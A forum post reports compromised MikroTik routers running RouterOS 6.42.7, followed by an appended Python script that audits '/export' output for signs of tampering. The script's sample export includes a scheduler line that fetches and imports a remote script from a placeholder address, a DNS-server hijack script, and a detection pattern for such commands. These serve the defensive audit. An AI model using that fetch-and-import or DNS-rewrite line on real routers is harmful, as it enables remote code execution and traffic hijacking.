Good Day
First post here. It was my understanding that upgrading to 6.42.7 and disabling winbox access would thwart the popular coinhive exploit, as an attacker could not gain access to credentials through the winbox exploit. Problem is, I keep on finding routers running 6.42.7 with /ip service winbox disabled happily jumping traffic, with scheduled scripts and obscure firewall and NAT rules, … Of course, I found this in the process of upgrading my routers to 6.44; as I manage 315 routers, this is rather a task. I will attach the config and inject scripts, including support files.
Please rename support.rsc to support.rif. Perhaps there are binary payloads left behind, or even a yet unknown way to gain access to routers? I also often find my drop rules disabled and the router under a DNS amplification attack, again on 6.42.7 with winbox disabled. As a company rule: winbox is never allowed in the input chain, ever. I guess all I am saying is: update to 6.44 if you are a user; however, please let the MikroTik engineers check for yet unknown exploits which might not have been patched.
I will not regard anything below 6.43.12 as safe…
supout.rsc (83.4 KB)
firstrun.rsc (857 Bytes)
inject.rsc (122 Bytes)
command.rsc (829 Bytes)
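As an added example that is not part of the original post or of any MikroTik tool: a small Python audit that parses the text of a RouterOS `/export` and flags the kinds of leftovers the post describes, namely scheduler entries that fetch or import something, scripts that touch DNS or proxy settings, drop rules that have been disabled, and winbox left enabled. The export text, the entry names and the 203.0.113.x addresses in it are constructed for this example, and the indicator patterns are an assumption of mine, not a list taken from the post or from MikroTik.

```python
import re
import shlex
from collections import defaultdict

# Constructed sample of a RouterOS /export (not from the original post).
# The "sync" scheduler entry, the "a" script and the disabled drop rule are
# hypothetical indicators of the kind the post reports finding.
SAMPLE_EXPORT = """\
# feb/01/2019 10:00:00 by RouterOS 6.42.7
/ip service
set winbox disabled=yes
/system scheduler
add interval=1d name=sync on-event="/tool fetch url=http://203.0.113.5/a.rsc mode=http;/import a.rsc" start-time=startup
add interval=1d name=backup on-event="/system backup save name=daily" start-time=03:00:00
/system script
add name=a source="/ip dns set servers=203.0.113.9"
/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=drop chain=input comment="drop all" disabled=yes
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
"""

# Assumed patterns worth a second look in scheduler events and script
# sources: remote fetch/import, DNS or SOCKS changes, chained script runs.
SUSPECT_PATTERNS = re.compile(r"fetch|/import|/ip dns|/ip socks|script run", re.I)


def parse_export(text):
    """Parse /export text into {section: [{"verb", "args", "props"}, ...]}."""
    sections = defaultdict(list)
    current = None
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):           # export continuation line
            buf += line[:-1] + " "        # assumes the break is at a token boundary
            continue
        line, buf = buf + line, ""
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # section header, e.g. /ip firewall filter
            current = line
            continue
        if current is None:
            continue
        tokens = shlex.split(line)        # handles quoted values such as on-event="..."
        if not tokens:
            continue
        entry = {"verb": tokens[0], "args": [], "props": {}}
        for tok in tokens[1:]:
            if "=" in tok:
                key, value = tok.split("=", 1)
                entry["props"][key] = value
            else:
                entry["args"].append(tok)  # positional item name, e.g. "winbox"
        sections[current].append(entry)
    return sections


def audit(sections):
    """Return (category, detail) findings for the indicators described above."""
    findings = []
    for e in sections.get("/ip service", []):
        if e["args"][:1] == ["winbox"] and e["props"].get("disabled") != "yes":
            findings.append(("service", "winbox is enabled"))
    for e in sections.get("/system scheduler", []):
        event = e["props"].get("on-event", "")
        if SUSPECT_PATTERNS.search(event):
            findings.append(("scheduler", f"{e['props'].get('name', '?')}: {event}"))
    for e in sections.get("/system script", []):
        src = e["props"].get("source", "")
        if SUSPECT_PATTERNS.search(src):
            findings.append(("script", f"{e['props'].get('name', '?')}: {src}"))
    for e in sections.get("/ip firewall filter", []):
        p = e["props"]
        if p.get("action") == "drop" and p.get("disabled") == "yes":
            findings.append(("firewall",
                             f"disabled drop rule in chain {p.get('chain', '?')}: {p.get('comment', '')}"))
    return findings


if __name__ == "__main__":
    for category, detail in audit(parse_export(SAMPLE_EXPORT)):
        print(f"[{category}] {detail}")
```

Feed it the output of `/export` collected from each router (for example over SSH) and review every hit by hand; an empty result only means none of these text-level indicators are present, it says nothing about binary payloads or about a compromise that lives outside the exported configuration.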